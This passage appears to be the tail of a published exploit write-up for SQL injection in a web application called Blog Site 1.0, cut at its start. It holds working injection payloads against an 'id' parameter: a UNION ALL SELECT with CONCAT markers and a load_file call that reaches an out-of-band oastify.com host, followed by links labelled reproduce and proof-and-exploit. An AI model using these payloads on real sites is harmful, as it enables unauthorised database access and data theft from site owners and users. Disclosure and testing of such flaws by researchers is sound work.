UNION query (NULL) - 9 columns<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' UNION ALL<br />SELECT<br />CONCAT(0x7171717671,0x416d7442627944704b55554267774f596d766967615341654a4242745a45467a71494f73596f776b,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/blog-site-1-0-108994688)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/07/blog-site-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>